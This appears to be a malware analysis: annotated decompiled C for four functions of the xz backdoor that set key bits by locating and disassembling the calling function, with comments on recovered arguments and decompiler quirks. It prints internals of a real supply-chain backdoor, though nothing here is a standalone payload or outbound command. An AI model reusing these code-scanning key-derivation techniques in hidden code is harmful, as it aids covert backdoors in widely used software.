xz decompiled backdoor key setting
// +0xABC0 (in .o)
// Entry point of the "set one key bit" step. Chooses which code address is
// scanned, then delegates to scan_code_and_set_key_bit and collapses its
// result to a bool.
//
// addr_to_disasm_if_valid: treated as a code address only when > 1; the
//                          values 0 and 1 act as sentinels meaning "use the
//                          caller's return address instead".
// key_bit_ind:             index of the key bit to set; forwarded unchanged.
// a3:                      forwarded as the callee's instruction count
//                          (a4 / insn_cnt further down); name not recovered.
// ket_init_unique_id:      per-call-site id used as the once-only flag index
//                          (listing's spelling of key_init_unique_id; kept).
// Returns true when scan_code_and_set_key_bit returned a positive value.
bool ensure_calling_only_once_and_set_key_bit(
    unsigned __int64 addr_to_disasm_if_valid,
    unsigned int key_bit_ind,
    unsigned int a3,
    unsigned int ket_init_unique_id)
{
    char *addr; // rax
    // Decompiler rendering of the saved return-address slot of this frame
    // ([rsp+0h]); it is never written here, so reading it yields the caller's
    // return address rather than garbage. The call below can therefore scan
    // the function that invoked this one.
    char *retaddr; // [rsp+0h] [rbp+0h]
    addr = (char *)addr_to_disasm_if_valid;
    if ( addr_to_disasm_if_valid <= 1 )
        addr = retaddr; // use the caller retaddr instead of the arg
    // The raw (possibly sentinel) value is still passed as the first argument;
    // the callee compares it with 0 to decide whether the first decoded
    // instruction is skipped.
    return (int)scan_code_and_set_key_bit(addr_to_disasm_if_valid, addr, key_bit_ind, a3, ket_init_unique_id) > 0;
}
// +0xAAF0 (in .o)
// Once-only guard around the code scan. Each key_init_unique_id owns a flag in
// global_state->was_key_init_called; the flag is set *before* the scan runs,
// so a failed scan is never retried for that id, and any later call with the
// same id returns 1 without doing anything.
//
// a1:                 the caller's raw address argument; only the test a1 == 0
//                     is used, forwarded to disasm_and_set_key_bit as its a5.
// code_start:         address inside the function to scan.
// key_bit_ind, a4:    forwarded to disasm_and_set_key_bit (a4 is the expected
//                     instruction count; on success it is also added to
//                     global_state->field_160).
// key_init_unique_id: index into was_key_init_called; no bounds check is
//                     visible here and the array size is not in this listing.
// Returns 1 on success, when global_state is NULL, or when the id was already
// handled; 0 only when find_function_bounds or disasm_and_set_key_bit fails.
__int64 scan_code_and_set_key_bit(
    __int64 a1,
    char *code_start,
    unsigned int key_bit_ind,
    unsigned int a4,
    unsigned int key_init_unique_id)
{
    global_state *v5; // rax
    unsigned __int8 *func_start; // [rsp+8h] [rbp-30h] OVERLAPPED BYREF
    func_start = 0;
    v5 = global_state;
    if ( global_state && !global_state->was_key_init_called[key_init_unique_id] )
    {
        // Marked as done before the work below: a failure is not retried.
        global_state->was_key_init_called[key_init_unique_id] = 1;
        // field_80 / field_88 are the backward / forward limits of the function
        // search, and field_88 is reused as the decode end -- presumably the
        // bounds of the code region that may be read; not confirmed here.
        // Only the function start is requested (third argument NULL).
        // a1 == 0 makes disasm_and_set_key_bit skip the first instruction.
        if ( !find_function_bounds(code_start, &func_start, 0, (char *)v5->field_80, v5->field_88, 1)
            || !disasm_and_set_key_bit(func_start, global_state->field_88, key_bit_ind, a4, a1 == 0) )
        {
            return 0;
        }
        // field_160 accumulates a4 over successful calls; its consumer is not
        // visible in this listing.
        global_state->field_160 += a4;
    }
    return 1;
}
// +0x0B90 (in .o)
// Locates the function containing `start` by probing byte by byte with
// is_func_start. The backward scan fills *out_function_start; the forward scan
// fills *out_function_end with the next function start, or with forward_limit
// when none is found. Either output pointer may be NULL to skip that direction.
//
// start:              address inside the function.
// out_function_start: receives the start found scanning backward; NULL skips.
// out_function_end:   receives the end (next function start); NULL skips.
// backward_limit:     lowest address the backward scan may reach; the loop
//                     stops above it, then it is tested once separately.
// forward_limit:      upper bound, passed to every is_func_start call and used
//                     as the default end.
// endbr64_check:      forwarded to is_func_start (presumably whether an
//                     endbr64 prefix is required; not visible here).
// Returns 1 on success; 0 only when the backward scan finds no function start.
unsigned int find_function_bounds(
    char *start,
    unsigned __int8 **out_function_start,
    unsigned __int8 **out_function_end,
    char *backward_limit,
    unsigned __int8 *forward_limit,
    int endbr64_check)
{
    char *i; // r15
    unsigned __int8 *v10; // r15
    char *fwd_i; // rbx
    unsigned __int8 *v13; // r14
    // Out-slot handed to is_func_start; only v15[0] is ever read. The 8-qword
    // size comes from the decompiler's stack layout, not from usage.
    __int64 v15[8]; // [rsp+18h] [rbp-40h] BYREF
    v15[0] = 0;
    if ( out_function_start )
    {
        // Step backward one byte at a time until is_func_start reports a match
        // or i reaches backward_limit (which this loop never probes itself).
        for ( i = start; backward_limit < i && !(unsigned int)is_func_start(i, forward_limit, (char **)v15, endbr64_check); --i )
            ;
        v10 = (unsigned __int8 *)v15[0];
        // v15[0] is presumably the address is_func_start matched (confirm
        // against is_func_start): NULL means nothing matched above
        // backward_limit; backward_limit itself is accepted only if it is a
        // function start in its own right.
        if ( !v15[0]
            || (char *)v15[0] == backward_limit
            && !(unsigned int)is_func_start(backward_limit, forward_limit, 0, endbr64_check) )
        {
            return 0;
        }
        *out_function_start = v10;
    }
    fwd_i = start + 1;
    // The forward scan stops 4 bytes short of forward_limit, presumably so the
    // probe can read a 4-byte pattern such as endbr64 without overrunning.
    v13 = forward_limit - 4;
    if ( out_function_end )
    {
        // Walk forward byte by byte; the first function start found becomes the
        // end of this function.
        while ( fwd_i < (char *)v13 )
        {
            if ( (unsigned int)is_func_start(fwd_i, forward_limit, 0, endbr64_check) )
                goto LABEL_19;
            ++fwd_i;
        }
        // Loop exhausted with fwd_i == v13: probe that last position. If
        // start + 1 was already past v13 the loop never ran and, because
        // v13 != fwd_i, the end is set to start + 1 without any probe -- a
        // quirk of the original, not corrected here.
        if ( v13 != (unsigned __int8 *)fwd_i || (unsigned int)is_func_start(fwd_i, forward_limit, 0, endbr64_check) )
LABEL_19:
            forward_limit = (unsigned __int8 *)fwd_i;
        // When nothing was found forward_limit itself is reported as the end.
        *out_function_end = forward_limit;
    }
    return 1;
}
// +0xAA30 (in .o)
// Walks the instructions in [start, end) one at a time and feeds each to
// set_nth_bit_if_smth together with the running bit index. Succeeds only when
// exactly insn_cnt instructions are decoded and every one of them is accepted.
//
// start, end:   byte range to decode (end is the caller's field_88 limit).
// key_bit_ind:  initial bit index; copied into i_ptr, which is passed by
//               pointer to set_nth_bit_if_smth (presumably advanced there;
//               not visible here).
// insn_cnt:     expected number of instructions.
// a5:           non-zero when the caller's original address argument was 0;
//               one instruction is then decoded and skipped before counting.
// Returns true when the count matches; false on a decode failure (sub_C80 /
// sub_AC70), a rejected instruction, or a count mismatch.
bool disasm_and_set_key_bit(
    unsigned __int8 *start,
    unsigned __int8 *end,
    unsigned int key_bit_ind,
    unsigned int insn_cnt,
    int a5)
{
    unsigned __int64 insn_i; // r12
    unsigned int i_ptr; // [rsp+Ch] [rbp-9Ch] OVERLAPPED BYREF
    disasm_res disasm; // [rsp+18h] [rbp-90h] BYREF
    // v7 has no declaration in this listing and is never read below;
    // decompiler residue of a register or stack store.
    v7 = 22LL;
    memset(&disasm, 0, sizeof(disasm));
    // Working copy of the bit index shared with set_nth_bit_if_smth.
    i_ptr = key_bit_ind;
    if ( a5 )
    {
        // No explicit address was supplied (a1 == 0 upstream): decode one
        // instruction and begin counting after it. A decode failure aborts.
        if ( !(unsigned int)sub_C80(start, end, 0, &disasm) )
            return 0;
        start = &disasm.insn_start[disasm.insn_size];
    }
    insn_i = 0;
    // sub_AC70 decodes the instruction at start into disasm; a false return
    // ends the walk (end of range or undecodable bytes are not distinguished).
    while ( (unsigned int)sub_AC70(start, end, &disasm) )
    {
        // Expected count reached: succeed without consuming this instruction.
        // With insn_cnt == 0 this fires on the first decode, so
        // set_nth_bit_if_smth is never called in that case.
        if ( insn_i == insn_cnt )
        {
            // insn_i == insn_cnt already holds, so both branches below reduce
            // to `return 1`; kept exactly as the decompiler emitted them.
            if ( insn_cnt < (unsigned int)insn_i )
                return 0;
            return insn_cnt == (_DWORD)insn_i;
        }
        ++insn_i;
        // Every counted instruction must be accepted by the bit setter.
        if ( !set_nth_bit_if_smth(&disasm, &i_ptr) )
            return 0;
        start = &disasm.insn_start[disasm.insn_size];
    }
    // Decoder stopped: success only if exactly insn_cnt instructions were
    // accepted (also true for insn_cnt == 0 when nothing decoded at all).
    return insn_cnt == (_DWORD)insn_i;
}